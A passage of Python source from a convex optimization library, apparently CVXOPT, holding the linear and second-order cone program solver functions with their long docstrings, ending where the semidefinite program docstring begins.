The argument primalstart is a dictionary with keys 'x' and 's',
and specifies a primal starting point. primalstart['x'] must
be a dense 'd' matrix of length n; primalstart['s'] must be a
positive dense 'd' matrix of length m.
The argument dualstart is a dictionary with keys 'z' and 'y',
and specifies a dual starting point. dualstart['y'] must
be a dense 'd' matrix of length p; dualstart['z'] must be a
positive dense 'd' matrix of length m.
When solver is None, we require n >= 1, Rank(A) = p and
Rank([G; A]) = n
Output arguments.
Returns a dictionary with keys 'status', 'x', 's', 'z', 'y',
'primal objective', 'dual objective', 'gap', 'relative gap',
'primal infeasibility', 'dual infeasibility', 'primal slack',
'dual slack', 'residual as primal infeasibility certificate',
'residual as dual infeasibility certificate'.
The 'status' field has values 'optimal', 'primal infeasible',
'dual infeasible', or 'unknown'. The values of the other fields
depend on the exit status and the solver used.
Status 'optimal'.
- 'x', 's', 'y', 'z' are an approximate solution of the primal and
dual optimality conditions
G*x + s = h, A*x = b
G'*z + A'*y + c = 0
s >= 0, z >= 0
s'*z = 0.
- 'primal objective': the primal objective c'*x.
- 'dual objective': the dual objective -h'*z - b'*y.
- 'gap': the duality gap s'*z.
- 'relative gap': the relative gap, defined as s'*z / -c'*x if
the primal objective is negative, s'*z / -(h'*z + b'*y) if the
dual objective is positive, and None otherwise.
- 'primal infeasibility': the residual in the primal constraints,
defined as the maximum of the residual in the inequalities
|| G*x + s + h || / max(1, ||h||)
and the residual in the equalities
|| A*x - b || / max(1, ||b||).
- 'dual infeasibility': the residual in the dual constraints,
defined as
|| G'*z + A'*y + c || / max(1, ||c||).
- 'primal slack': the smallest primal slack min_k s_k.
- 'dual slack': the smallest dual slack min_k z_k.
- 'residual as primal infeasibility certificate': None.
- 'residual as dual infeasibility certificate': None.
If the default solver is used, the primal infeasibility is
guaranteed to be less than solvers.options['feastol']
(default 1e-7). The dual infeasibility is guaranteed to be less
than solvers.options['feastol'] (default 1e-7). The gap is less
than solvers.options['abstol'] (default 1e-7) or the relative gap
is less than solvers.options['reltol'] (default 1e-6).
For the other solvers, the default GLPK or MOSEK exit criteria
apply.
Status 'primal infeasible'. If the GLPK solver is used, all the
fields except the status field are None. For the default and
the MOSEK solvers, the values are as follows.
- 'x', 's': None.
- 'y', 'z' are an approximate certificate of infeasibility
-h'*z - b'*y = 1, G'*z + A'*y = 0, z >= 0.
- 'primal objective': None.
- 'dual objective': 1.0.
- 'gap', 'relative gap': None.
- 'primal infeasibility' and 'dual infeasibility': None.
- 'primal slack': None.
- 'dual slack': the smallest dual slack min z_k.
- 'residual as primal infeasibility certificate': the residual in
the condition of the infeasibility certificate, defined as
|| G'*z + A'*y || / max(1, ||c||).
- 'residual as dual infeasibility certificate': None.
If the default solver is used, the residual as primal infeasiblity
certificate is guaranteed to be less than
solvers.options['feastol'] (default 1e-7). For the other
solvers, the default GLPK or MOSEK exit criteria apply.
Status 'dual infeasible'. If the GLPK solver is used, all the
fields except the status field are empty. For the default and the
MOSEK solvers, the values are as follows.
- 'x', 's' are an approximate proof of dual infeasibility
c'*x = -1, G*x + s = 0, A*x = 0, s >= 0.
- 'y', 'z': None.
- 'primal objective': -1.0.
- 'dual objective': None.
- 'gap', 'relative gap': None.
- 'primal infeasibility' and 'dual infeasibility': None.
- 'primal slack': the smallest primal slack min_k s_k .
- 'dual slack': None.
- 'residual as primal infeasibility certificate': None.
- 'residual as dual infeasibility certificate: the residual in
the conditions of the infeasibility certificate, defined as
the maximum of
|| G*x + s || / max(1, ||h||) and || A*x || / max(1, ||b||).
If the default solver is used, the residual as dual infeasiblity
certificate is guaranteed to be less than
solvers.options['feastol'] (default 1e-7). For the other
solvers, the default GLPK or MOSEK exit criteria apply.
Status 'unknown'. If the GLPK or MOSEK solver is used, all the
fields except the status field are None. If the default solver
is used, the values are as follows.
- 'x', 'y', 's', 'z' are the last iterates before termination.
These satisfy s > 0 and z > 0, but are not necessarily feasible.
- 'primal objective': the primal cost c'*x.
- 'dual objective': the dual cost -h'*z - b'*y.
- 'gap': the duality gap s'*z.
- 'relative gap': the relative gap, defined as s'*z / -c'*x if the
primal cost is negative, s'*z / -(h'*z + b'*y) if the dual cost
is positive, and None otherwise.
- 'primal infeasibility ': the residual in the primal constraints,
defined as the maximum of the residual in the inequalities
|| G*x + s + h || / max(1, ||h||)
and the residual in the equalities
|| A*x - b || / max(1, ||b||).
- 'dual infeasibility': the residual in the dual constraints,
defined as
|| G'*z + A'*y + c || / max(1, ||c||).
- 'primal slack': the smallest primal slack min_k s_k.
- 'dual slack': the smallest dual slack min_k z_k.
- 'residual as primal infeasibility certificate':
None if h'*z + b'*y >= 0; the residual
|| G'*z + A'*y || / (-(h'*z + b'*y) * max(1, ||c||) )
otherwise.
- 'residual as dual infeasibility certificate':
None if c'*x >= 0; the maximum of the residuals
|| G*x + s || / (-c'*x * max(1, ||h||))
and
|| A*x || / (-c'*x * max(1, ||b||))
otherwise.
Termination with status 'unknown' indicates that the algorithm
failed to find a solution that satisfies the specified tolerances.
In some cases, the returned solution may be fairly accurate. If
the primal and dual infeasibilities, the gap, and the relative gap
are small, then x, y, s, z are close to optimal. If the residual
as primal infeasibility certificate is small, then
y / (-h'*z - b'*y), z / (-h'*z - b'*y)
provide an approximate certificate of primal infeasibility. If
the residual as certificate of dual infeasibility is small, then
x / (-c'*x), s / (-c'*x)
provide an approximate proof of dual infeasibility.
Control parameters.
The control parameters for the different solvers can be modified
by adding an entry to the dictionary cvxopt.solvers.options. The
following parameters control the execution of the default solver.
options['show_progress'] True/False (default: True)
options['maxiters'] positive integer (default: 100)
options['refinement'] positive integer (default: 0)
options['abstol'] scalar (default: 1e-7)
options['reltol'] scalar (default: 1e-6)
options['feastol'] scalar (default: 1e-7).
The control parameter names for GLPK are strings with the name of
the GLPK parameter, listed in the GLPK documentation. The MOSEK
parameters can me modified by adding an entry options['mosek'],
containing a dictionary with MOSEK parameter/value pairs, as
described in the MOSEK documentation.
Options that are not recognized are replaced by their default
values.
"""
options = kwargs.get('options',globals()['options'])
import math
from cvxopt import base, blas, misc
from cvxopt.base import matrix, spmatrix
if not isinstance(c, matrix) or c.typecode != 'd' or c.size[1] != 1:
raise TypeError("'c' must be a dense column matrix")
n = c.size[0]
if n < 1: raise ValueError("number of variables must be at least 1")
if not isinstance(G, (matrix,spmatrix)) or G.typecode != 'd' or G.size[1] != n:
raise TypeError("'G' must be a dense or sparse 'd' matrix "\
"with %d columns" %n)
m = G.size[0]
if not isinstance(h, matrix) or h.typecode != 'd' or h.size != (m,1):
raise TypeError("'h' must be a 'd' matrix of size (%d,1)" %m)
if A is None: A = spmatrix([], [], [], (0,n), 'd')
if not isinstance(A,(matrix,spmatrix)) or A.typecode != 'd' or A.size[1] != n:
raise TypeError("'A' must be a dense or sparse 'd' matrix "\
"with %d columns" %n)
p = A.size[0]
if b is None: b = matrix(0.0, (0,1))
if not isinstance(b,matrix) or b.typecode != 'd' or b.size != (p,1):
raise TypeError("'b' must be a dense matrix of size (%d,1)" %p)
if solver == 'glpk':
try: from cvxopt import glpk
except ImportError: raise ValueError("invalid option "\
"(solver = 'glpk'): cvxopt.glpk is not installed")
opts = options.get('glpk',None)
if opts:
status, x, z, y = glpk.lp(c, G, h, A, b, options = opts)
else:
status, x, z, y = glpk.lp(c, G, h, A, b)
if status == 'optimal':
resx0 = max(1.0, blas.nrm2(c))
resy0 = max(1.0, blas.nrm2(b))
resz0 = max(1.0, blas.nrm2(h))
pcost = blas.dot(c,x)
dcost = -blas.dot(h,z) - blas.dot(b,y)
s = matrix(h)
base.gemv(G, x, s, alpha=-1.0, beta=1.0)
gap = blas.dot(s, z)
if pcost < 0.0:
relgap = gap / -pcost
elif dcost > 0.0:
relgap = gap / dcost
else:
relgap = None
# rx = c + G'*z + A'*y
rx = matrix(c)
base.gemv(G, z, rx, beta = 1.0, trans = 'T')
base.gemv(A, y, rx, beta = 1.0, trans = 'T')
resx = blas.nrm2(rx) / resx0
# ry = b - A*x
ry = matrix(b)
base.gemv(A, x, ry, alpha = -1.0, beta = 1.0)
resy = blas.nrm2(ry) / resy0
# rz = G*x + s - h
rz = matrix(0.0, (m,1))
base.gemv(G, x, rz)
blas.axpy(s, rz)
blas.axpy(h, rz, alpha = -1.0)
resz = blas.nrm2(rz) / resz0
dims = {'l': m, 's': [], 'q': []}
pslack = -misc.max_step(s, dims)
dslack = -misc.max_step(z, dims)
pres, dres = max(resy, resz), resx
pinfres, dinfres = None, None
else:
s = None
pcost, dcost = None, None
gap, relgap = None, None
pres, dres = None, None
pslack, dslack = None, None
pinfres, dinfres = None, None
return {'status': status, 'x': x, 's': s, 'y': y, 'z': z,
'primal objective': pcost, 'dual objective': dcost,
'gap': gap, 'relative gap': relgap,
'primal infeasibility': pres, 'dual infeasibility': dres,
'primal slack': pslack, 'dual slack': dslack,
'residual as primal infeasibility certificate': pinfres,
'residual as dual infeasibility certificate': dinfres}
if solver == 'mosek':
try:
from cvxopt import msk
import mosek
except ImportError:
raise ValueError("invalid option (solver = 'mosek'): "\
"cvxopt.msk is not installed")
opts = options.get('mosek',None)
if opts:
solsta, x, z, y = msk.lp(c, G, h, A, b, options=opts)
else:
solsta, x, z, y = msk.lp(c, G, h, A, b)
resx0 = max(1.0, blas.nrm2(c))
resy0 = max(1.0, blas.nrm2(b))
resz0 = max(1.0, blas.nrm2(h))
if solsta in (mosek.solsta.optimal, getattr(mosek.solsta,'near_optimal',None)):
if solsta is mosek.solsta.optimal: status = 'optimal'
else: status = 'near optimal'
pcost = blas.dot(c,x)
dcost = -blas.dot(h,z) - blas.dot(b,y)
# s = h - G*x
s = matrix(h)
base.gemv(G, x, s, alpha = -1.0, beta = 1.0)
gap = blas.dot(s, z)
if pcost < 0.0:
relgap = gap / -pcost
elif dcost > 0.0:
relgap = gap / dcost
else:
relgap = None
# rx = c + G'*z + A'*y
rx = matrix(c)
base.gemv(G, z, rx, beta = 1.0, trans = 'T')
base.gemv(A, y, rx, beta = 1.0, trans = 'T')
resx = blas.nrm2(rx) / resx0
# ry = b - A*x
ry = matrix(b)
base.gemv(A, x, ry, alpha = -1.0, beta = 1.0)
resy = blas.nrm2(ry) / resy0
# rz = G*x + s - h
rz = matrix(0.0, (m,1))
base.gemv(G, x, rz)
blas.axpy(s, rz)
blas.axpy(h, rz, alpha = -1.0)
resz = blas.nrm2(rz) / resz0
dims = {'l': m, 's': [], 'q': []}
pslack = -misc.max_step(s, dims)
dslack = -misc.max_step(z, dims)
pres, dres = max(resy, resz), resx
pinfres, dinfres = None, None
elif solsta is mosek.solsta.prim_infeas_cer:
status = 'primal infeasible'
hz, by = blas.dot(h, z), blas.dot(b, y)
blas.scal(1.0 / (-hz - by), y)
blas.scal(1.0 / (-hz - by), z)
# rx = -A'*y - G'*z
rx = matrix(0.0, (n,1))
base.gemv(A, y, rx, alpha = -1.0, trans = 'T')
base.gemv(G, z, rx, alpha = -1.0, beta = 1.0, trans = 'T')
pinfres = blas.nrm2(rx) / resx0
dinfres = None
x, s = None, None
pres, dres = None, None
pcost, dcost = None, 1.0
gap, relgap = None, None
dims = {'l': m, 's': [], 'q': []}
dslack = -misc.max_step(z, dims)
pslack = None
elif solsta == mosek.solsta.dual_infeas_cer:
status = 'dual infeasible'
cx = blas.dot(c,x)
blas.scal(-1.0/cx, x)
s = matrix(0.0, (m,1))
base.gemv(G, x, s, alpha = -1.0)
# ry = A*x
ry = matrix(0.0, (p,1))
base.gemv(A, x, ry)
resy = blas.nrm2(ry) / resy0
# rz = s + G*x
rz = matrix(s)
base.gemv(G, x, rz, beta = 1.0)
resz = blas.nrm2(rz) / resz0
pres, dres = None, None
dinfres, pinfres = max(resy, resz), None
z, y = None, None
pcost, dcost = -1.0, None
gap, relgap = None, None
dims = {'l': m, 's': [], 'q': []}
pslack = -misc.max_step(s, dims)
dslack = None
else:
status = 'unknown'
s = None
pcost, dcost = None, None
gap, relgap = None, None
pres, dres = None, None
pinfres, dinfres = None, None
pslack, dslack = None, None
return {'status': status, 'x': x, 's': s, 'y': y, 'z': z,
'primal objective': pcost, 'dual objective': dcost,
'gap': gap, 'relative gap': relgap,
'primal infeasibility': pres, 'dual infeasibility': dres,
'residual as primal infeasibility certificate': pinfres,
'residual as dual infeasibility certificate': dinfres,
'primal slack': pslack, 'dual slack': dslack}
return conelp(c, G, h, {'l': m, 'q': [], 's': []}, A, b, primalstart,
dualstart, kktsolver = kktsolver, options = options)
def socp(c, Gl = None, hl = None, Gq = None, hq = None, A = None, b = None,
kktsolver = None, solver = None, primalstart = None, dualstart = None, **kwargs):
"""
Solves a pair of primal and dual SOCPs
minimize c'*x
subject to Gl*x + sl = hl
Gq[k]*x + sq[k] = hq[k], k = 0, ..., N-1
A*x = b
sl >= 0,
sq[k] >= 0, k = 0, ..., N-1
maximize -hl'*z - sum_k hq[k]'*zq[k] - b'*y
subject to Gl'*zl + sum_k Gq[k]'*zq[k] + A'*y + c = 0
zl >= 0, zq[k] >= 0, k = 0, ..., N-1.
The inequalities sl >= 0 and zl >= 0 are elementwise vector
inequalities. The inequalities sq[k] >= 0, zq[k] >= 0 are second
order cone inequalities, i.e., equivalent to
sq[k][0] >= || sq[k][1:] ||_2, zq[k][0] >= || zq[k][1:] ||_2.
Input arguments.
Gl is a dense or sparse 'd' matrix of size (ml, n). hl is a
dense 'd' matrix of size (ml, 1). The default values of Gl and hl
are matrices with zero rows.
The argument Gq is a list of N dense or sparse 'd' matrices of
size (m[k] n), k = 0, ..., N-1, where m[k] >= 1. hq is a list
of N dense 'd' matrices of size (m[k], 1), k = 0, ..., N-1.
The default values of Gq and hq are empty lists.
A is a dense or sparse 'd' matrix of size (p,1). b is a dense 'd'
matrix of size (p,1). The default values of A and b are matrices
with zero rows.
solver is None or 'mosek'. The default solver (None) uses the
cvxopt conelp() function. The 'mosek' solver is the SOCP solver
from MOSEK.
The arguments primalstart and dualstart are ignored when solver
is 'mosek', and are optional when solver is None.
The argument primalstart is a dictionary with keys 'x', 'sl', 'sq',
and specifies an optional primal starting point.
primalstart['x'] is a dense 'd' matrix of size (n,1).
primalstart['sl'] is a positive dense 'd' matrix of size (ml,1).
primalstart['sq'] is a list of matrices of size (m[k],1), positive
with respect to the second order cone of order m[k].
The argument dualstart is a dictionary with keys 'y', 'zl', 'zq',
and specifies an optional dual starting point.
dualstart['y'] is a dense 'd' matrix of size (p,1).
dualstart['zl'] is a positive dense 'd' matrix of size (ml,1).
dualstart['sq'] is a list of matrices of size (m[k],1), positive
with respect to the second order cone of order m[k].
Output arguments.
Returns a dictionary with keys 'status', 'x', 'sl', 'sq', 'zl',
'zq', 'y', 'primal objective', 'dual objective', 'gap',
'relative gap', 'primal infeasibility', 'dual infeasibility',
'primal slack', 'dual slack', 'residual as primal infeasibility
certificate', 'residual as dual infeasibility certificate'.
The 'status' field has values 'optimal', 'primal infeasible',
'dual infeasible', or 'unknown'. The values of the other fields
depend on the exit status and the solver used.
Status 'optimal'.
- 'x', 'sl', 'sq', 'y', 'zl', 'zq' are an approximate solution of
the primal and dual optimality conditions
G*x + s = h, A*x = b
G'*z + A'*y + c = 0
s >= 0, z >= 0
s'*z = 0
where
G = [ Gl; Gq[0]; ...; Gq[N-1] ]
h = [ hl; hq[0]; ...; hq[N-1] ]
s = [ sl; sq[0]; ...; sq[N-1] ]
z = [ zl; zq[0]; ...; zq[N-1] ].
- 'primal objective': the primal objective c'*x.
- 'dual objective': the dual objective -h'*z - b'*y.
- 'gap': the duality gap s'*z.
- 'relative gap': the relative gap, defined as s'*z / -c'*x if
the primal objective is negative, s'*z / -(h'*z + b'*y) if the
dual objective is positive, and None otherwise.
- 'primal infeasibility': the residual in the primal constraints,
defined as the maximum of the residual in the inequalities
|| G*x + s + h || / max(1, ||h||)
and the residual in the equalities
|| A*x - b || / max(1, ||b||).
- 'dual infeasibility': the residual in the dual constraints,
defined as
|| G'*z + A'*y + c || / max(1, ||c||).
- 'primal slack': the smallest primal slack,
min( min_k sl_k, min_k (sq[k][0] - || sq[k][1:] ||) ).
- 'dual slack': the smallest dual slack,
min( min_k zl_k, min_k (zq[k][0] - || zq[k][1:] ||) ).
- 'residual as primal infeasibility certificate': None.
- 'residual as dual infeasibility certificate': None.
If the default solver is used, the primal infeasibility is
guaranteed to be less than solvers.options['feastol']
(default 1e-7). The dual infeasibility is guaranteed to be less
than solvers.options['feastol'] (default 1e-7). The gap is less
than solvers.options['abstol'] (default 1e-7) or the relative gap
is less than solvers.options['reltol'] (default 1e-6).
If the MOSEK solver is used, the default MOSEK exit criteria
apply.
Status 'primal infeasible'.
- 'x', 'sl', 'sq': None.
- 'y', 'zl', 'zq' are an approximate certificate of infeasibility
-h'*z - b'*y = 1, G'*z + A'*y = 0, z >= 0.
- 'primal objective': None.
- 'dual objective': 1.0.
- 'gap', 'relative gap': None.
- 'primal infeasibility' and 'dual infeasibility': None.
- 'primal slack': None.
- 'dual slack': the smallest dual slack,
min( min_k zl_k, min_k (zq[k][0] - || zq[k][1:] ||) ).
- 'residual as primal infeasibility certificate': the residual in
the condition of the infeasibility certificate, defined as
|| G'*z + A'*y || / max(1, ||c||).
- 'residual as dual infeasibility certificate': None.
If the default solver is used, the residual as primal infeasiblity
certificate is guaranteed to be less than
solvers.options['feastol'] (default 1e-7). If the MOSEK solver is
used, the default MOSEK exit criteria apply.
Status 'dual infeasible'.
- 'x', 'sl', 'sq': an approximate proof of dual infeasibility
c'*x = -1, G*x + s = 0, A*x = 0, s >= 0.
- 'y', 'zl', 'zq': None.
- 'primal objective': -1.0.
- 'dual objective': None.
- 'gap', 'relative gap': None.
- 'primal infeasibility' and 'dual infeasibility': None.
- 'primal slack': the smallest primal slack,
min( min_k sl_k, min_k (sq[k][0] - || sq[k][1:] ||) ).
- 'dual slack': None.
- 'residual as primal infeasibility certificate': None.
- 'residual as dual infeasibility certificate: the residual in
the conditions of the infeasibility certificate, defined as
the maximum of
|| G*x + s || / max(1, ||h||) and || A*x || / max(1, ||b||).
If the default solver is used, the residual as dual infeasiblity
certificate is guaranteed to be less than
solvers.options['feastol'] (default 1e-7). If the MOSEK solver
is used, the default MOSEK exit criteria apply.
Status 'unknown'. If the MOSEK solver is used, all the fields
except the status field are empty. If the default solver
is used, the values are as follows.
- 'x', 'y', 'sl', 'sq', 'zl', 'zq': the last iterates before
termination. These satisfy s > 0 and z > 0, but are not
necessarily feasible.
- 'primal objective': the primal cost c'*x.
- 'dual objective': the dual cost -h'*z - b'*y.
- 'gap': the duality gap s'*z.
- 'relative gap': the relative gap, defined as s'*z / -c'*x if the
primal cost is negative, s'*z / -(h'*z + b'*y) if the dual cost
is positive, and None otherwise.
- 'primal infeasibility ': the residual in the primal constraints,
defined as the maximum of the residual in the inequalities
|| G*x + s + h || / max(1, ||h||)
and the residual in the equalities
|| A*x - b || / max(1, ||b||).
- 'dual infeasibility': the residual in the dual constraints,
defined as
|| G'*z + A'*y + c || / max(1, ||c||).
- 'primal slack': the smallest primal slack,
min( min_k sl_k, min_k (sq[k][0] - || sq[k][1:] ||) ).
- 'dual slack': the smallest dual slack,
min( min_k zl_k, min_k (zq[k][0] - || zq[k][1:] ||) ).
- 'residual as primal infeasibility certificate':
None if h'*z + b'*y >= 0; the residual
|| G'*z + A'*y || / (-(h'*z + b'*y) * max(1, ||c||) )
otherwise.
- 'residual as dual infeasibility certificate':
None if c'*x >= 0; the maximum of the residuals
|| G*x + s || / (-c'*x * max(1, ||h||))
and
|| A*x || / (-c'*x * max(1, ||b||))
otherwise.
Termination with status 'unknown' indicates that the algorithm
failed to find a solution that satisfies the specified tolerances.
In some cases, the returned solution may be fairly accurate. If
the primal and dual infeasibilities, the gap, and the relative gap
are small, then x, y, s, z are close to optimal. If the residual
as primal infeasibility certificate is small, then
y / (-h'*z - b'*y), z / (-h'*z - b'*y)
provide an approximate certificate of primal infeasibility. If
the residual as certificate of dual infeasibility is small, then
x / (-c'*x), s / (-c'*x)
provide an approximate proof of dual infeasibility.
Control parameters.
The control parameters for the different solvers can be modified
by adding an entry to the dictionary cvxopt.solvers.options. The
following parameters control the execution of the default solver.
options['show_progress'] True/False (default: True)
options['maxiters'] positive integer (default: 100)
options['refinement'] positive integer (default: 1)
options['abstol'] scalar (default: 1e-7)
options['reltol'] scalar (default: 1e-6)
options['feastol'] scalar (default: 1e-7).
The MOSEK parameters can me modified by adding an entry
options['mosek'], containing a dictionary with MOSEK
parameter/value pairs, as described in the MOSEK documentation.
Options that are not recognized are replaced by their default
values.
"""
from cvxopt import base, blas
from cvxopt.base import matrix, spmatrix
if not isinstance(c,matrix) or c.typecode != 'd' or c.size[1] != 1:
raise TypeError("'c' must be a dense column matrix")
n = c.size[0]
if n < 1: raise ValueError("number of variables must be at least 1")
if Gl is None: Gl = spmatrix([], [], [], (0,n), tc='d')
if not isinstance(Gl,(matrix,spmatrix)) or Gl.typecode != 'd' or Gl.size[1] != n:
raise TypeError("'Gl' must be a dense or sparse 'd' matrix "\
"with %d columns" %n)
ml = Gl.size[0]
if hl is None: hl = matrix(0.0, (0,1))
if not isinstance(hl, matrix) or hl.typecode != 'd' or \
hl.size != (ml,1):
raise TypeError("'hl' must be a dense 'd' matrix of " \
"size (%d,1)" %ml)
if Gq is None: Gq = []
if not isinstance(Gq,list) or [ G for G in Gq if not isinstance(G,(matrix,spmatrix)) \
or G.typecode != 'd' or G.size[1] != n ]:
raise TypeError("'Gq' must be a list of sparse or dense 'd' "\
"matrices with %d columns" %n)
mq = [ G.size[0] for G in Gq ]
a = [ k for k in range(len(mq)) if mq[k] == 0 ]
if a: raise TypeError("the number of rows of Gq[%d] is zero" %a[0])
if hq is None: hq = []
if not isinstance(hq,list) or len(hq) != len(mq) or \
[ h for h in hq if not isinstance(h,(matrix,spmatrix)) or h.typecode != 'd' ]:
raise TypeError("'hq' must be a list of %d dense or sparse "\
"'d' matrices" %len(mq))
a = [ k for k in range(len(mq)) if hq[k].size != (mq[k], 1) ]
if a:
k = a[0]
raise TypeError("'hq[%d]' has size (%d,%d). Expected size "\
"is (%d,1)." %(k, hq[k].size[0], hq[k].size[1], mq[k]))
if A is None: A = spmatrix([], [], [], (0,n), 'd')
if not isinstance(A,(matrix,spmatrix)) or A.typecode != 'd' or A.size[1] != n:
raise TypeError("'A' must be a dense or sparse 'd' matrix "\
"with %d columns" %n)
p = A.size[0]
if b is None: b = matrix(0.0, (0,1))
if not isinstance(b,matrix) or b.typecode != 'd' or b.size != (p,1):
raise TypeError("'b' must be a dense matrix of size (%d,1)" %p)
dims = {'l': ml, 'q': mq, 's': []}
N = ml + sum(mq)
if solver == 'mosek':
from cvxopt import misc
try:
from cvxopt import msk
import mosek
except ImportError:
raise ValueError("invalid option (solver = 'mosek'): "\
"cvxopt.msk is not installed")
if p: raise ValueError("socp() with the solver = 'mosek' option "\
"does not handle problems with equality constraints")
opts = options.get('mosek',None)
if opts:
solsta, x, zl, zq = msk.socp(c, Gl, hl, Gq, hq, options=opts)
else:
solsta, x, zl, zq = msk.socp(c, Gl, hl, Gq, hq)
resx0 = max(1.0, blas.nrm2(c))
rh = matrix([ blas.nrm2(hl) ] + [ blas.nrm2(hqk) for hqk in hq ])
resz0 = max(1.0, blas.nrm2(rh))
if solsta in (mosek.solsta.optimal, getattr(mosek.solsta,'near_optimal')):
if solsta is mosek.solsta.optimal: status = 'optimal'
else: status = 'near optimal'
y = matrix(0.0, (0,1))
pcost = blas.dot(c,x)
dcost = -blas.dot(hl,zl) - \
sum([ blas.dot(hq[k],zq[k]) for k in range(len(mq))])
sl = matrix(hl)
base.gemv(Gl, x, sl, alpha = -1.0, beta = 1.0)
sq = [ +hqk for hqk in hq ]
for k in range(len(Gq)):
base.gemv(Gq[k], x, sq[k], alpha = -1.0, beta = 1.0)
gap = blas.dot(sl, zl) + \
sum([blas.dot(zq[k],sq[k]) for k in range(len(mq))])
if pcost < 0.0:
relgap = gap / -pcost
elif dcost > 0.0:
relgap = gap / dcost
else:
relgap = None
# rx = c + G'*z
rx = matrix(c)
base.gemv(Gl, zl, rx, beta = 1.0, trans = 'T')
for k in range(len(mq)):
base.gemv(Gq[k], zq[k], rx, beta = 1.0, trans = 'T')
resx = blas.nrm2(rx) / resx0
# rz = G*x + s - h
rz = matrix(0.0, (ml + sum(mq),1))
base.gemv(Gl, x, rz)
blas.axpy(sl, rz)
blas.axpy(hl, rz, alpha = -1.0)
ind = ml
for k in range(len(mq)):
base.gemv(Gq[k], x, rz, offsety = ind)
blas.axpy(sq[k], rz, offsety = ind)
blas.axpy(hq[k], rz, alpha = -1.0, offsety = ind)
ind += mq[k]
resz = blas.nrm2(rz) / resz0
s, z = matrix(0.0, (N,1)), matrix(0.0, (N,1))
blas.copy(sl, s)
blas.copy(zl, z)
ind = ml
for k in range(len(mq)):
blas.copy(zq[k], z, offsety = ind)
blas.copy(sq[k], s, offsety = ind)
ind += mq[k]
pslack = -misc.max_step(s, dims)
dslack = -misc.max_step(z, dims)
pres, dres = resz, resx
pinfres, dinfres = None, None
elif solsta is mosek.solsta.dual_infeas_cer:
status = 'primal infeasible'
y = matrix(0.0, (0,1))
hz = blas.dot(hl, zl) + sum([blas.dot(hq[k],zq[k]) for k
in range(len(mq))])
blas.scal(1.0 / -hz, zl)
for k in range(len(mq)):
blas.scal(1.0 / -hz, zq[k])
x, sl, sq = None, None, None
# rx = - G'*z
rx = matrix(0.0, (n,1))
base.gemv(Gl, zl, rx, alpha = -1.0, beta = 1.0, trans = 'T')
for k in range(len(mq)):
base.gemv(Gq[k], zq[k], rx, beta = 1.0, trans = 'T')
pinfres = blas.nrm2(rx) / resx0
dinfres = None
z = matrix(0.0, (N,1))
blas.copy(zl, z)
ind = ml
for k in range(len(mq)):
blas.copy(zq[k], z, offsety = ind)
ind += mq[k]
dslack = -misc.max_step(z, dims)
pslack = None
x, s = None, None
pres, dres = None, None
pcost, dcost = None, 1.0
gap, relgap = None, None
elif solsta == mosek.solsta.prim_infeas_cer:
status = 'dual infeasible'
cx = blas.dot(c,x)
blas.scal(-1.0/cx, x)
sl = matrix(0.0, (ml,1))
base.gemv(Gl, x, sl, alpha = -1.0)
sq = [ matrix(0.0, (mqk,1)) for mqk in mq ]
for k in range(len(mq)):
base.gemv(Gq[k], x, sq[k], alpha = -1.0, beta = 1.0)
# rz = s + G*x
rz = matrix( [sl] + [sqk for sqk in sq])
base.gemv(Gl, x, rz, beta = 1.0)
ind = ml
for k in range(len(mq)):
base.gemv(Gq[k], x, rz, beta = 1.0, offsety = ind)
ind += mq[k]
resz = blas.nrm2(rz) / resz0
dims = {'l': ml, 's': [], 'q': mq}
s = matrix(0.0, (N,1))
blas.copy(sl, s)
ind = ml
for k in range(len(mq)):
blas.copy(sq[k], s, offsety = ind)
ind += mq[k]
pslack = -misc.max_step(s, dims)
dslack = None
pres, dres = None, None
dinfres, pinfres = resz, None
z, y = None, None
pcost, dcost = -1.0, None
gap, relgap = None, None
else:
status = 'unknown'
sl, sq = None, None
zl, zq = None, None
x, y = None, None
pcost, dcost = None, None
gap, relgap = None, None
pres, dres = None, None
pinfres, dinfres = None, None
pslack, dslack = None, None
return {'status': status, 'x': x, 'sl': sl, 'sq': sq, 'y': y,
'zl': zl, 'zq': zq, 'primal objective': pcost,
'dual objective': dcost, 'gap': gap, 'relative gap': relgap,
'primal infeasibility': pres, 'dual infeasibility': dres,
'residual as primal infeasibility certificate': pinfres,
'residual as dual infeasibility certificate': dinfres,
'primal slack': pslack, 'dual slack': dslack}
h = matrix(0.0, (N,1))
if isinstance(Gl,matrix) or [ Gk for Gk in Gq if isinstance(Gk,matrix) ]:
G = matrix(0.0, (N, n))
else:
G = spmatrix([], [], [], (N, n), 'd')
h[:ml] = hl
G[:ml,:] = Gl
ind = ml
for k in range(len(mq)):
h[ind : ind + mq[k]] = hq[k]
G[ind : ind + mq[k], :] = Gq[k]
ind += mq[k]
if primalstart:
ps = {}
ps['x'] = primalstart['x']
ps['s'] = matrix(0.0, (N,1))
if ml: ps['s'][:ml] = primalstart['sl']
if mq:
ind = ml
for k in range(len(mq)):
ps['s'][ind : ind + mq[k]] = primalstart['sq'][k][:]
ind += mq[k]
else:
ps = None
if dualstart:
ds = {}
if p: ds['y'] = dualstart['y']
ds['z'] = matrix(0.0, (N,1))
if ml: ds['z'][:ml] = dualstart['zl']
if mq:
ind = ml
for k in range(len(mq)):
ds['z'][ind : ind + mq[k]] = dualstart['zq'][k][:]
ind += mq[k]
else:
ds = None
sol = conelp(c, G, h, dims, A = A, b = b, primalstart = ps, dualstart = ds, kktsolver = kktsolver, options = options)
if sol['s'] is None:
sol['sl'] = None
sol['sq'] = None
else:
sol['sl'] = sol['s'][:ml]
sol['sq'] = [ matrix(0.0, (m,1)) for m in mq ]
ind = ml
for k in range(len(mq)):
sol['sq'][k][:] = sol['s'][ind : ind+mq[k]]
ind += mq[k]
del sol['s']
if sol['z'] is None:
sol['zl'] = None
sol['zq'] = None
else:
sol['zl'] = sol['z'][:ml]
sol['zq'] = [ matrix(0.0, (m,1)) for m in mq]
ind = ml
for k in range(len(mq)):
sol['zq'][k][:] = sol['z'][ind : ind+mq[k]]
ind += mq[k]
del sol['z']
return sol
def sdp(c, Gl = None, hl = None, Gs = None, hs = None, A = None, b = None,
kktsolver = None, solver = None, primalstart = None, dualstart = None, **kwargs):
"""
Solves a pair of primal and dual SDPs
minimize c'*x
subject to Gl*x + sl = hl
mat(Gs[k]*x) + ss[k] = hs[k], k = 0, ..., N-1
A*x = b
sl >= 0, ss[k] >= 0, k = 0, ..., N-1
maximize -hl'*z - sum_k trace(hs[k]*zs[k]) - b'*y
subject to Gl'*zl + sum_k Gs[k]'*vec(zs[k]) + A'*y + c = 0
zl >= 0, zs[k] >= 0, k = 0, ..., N-1.
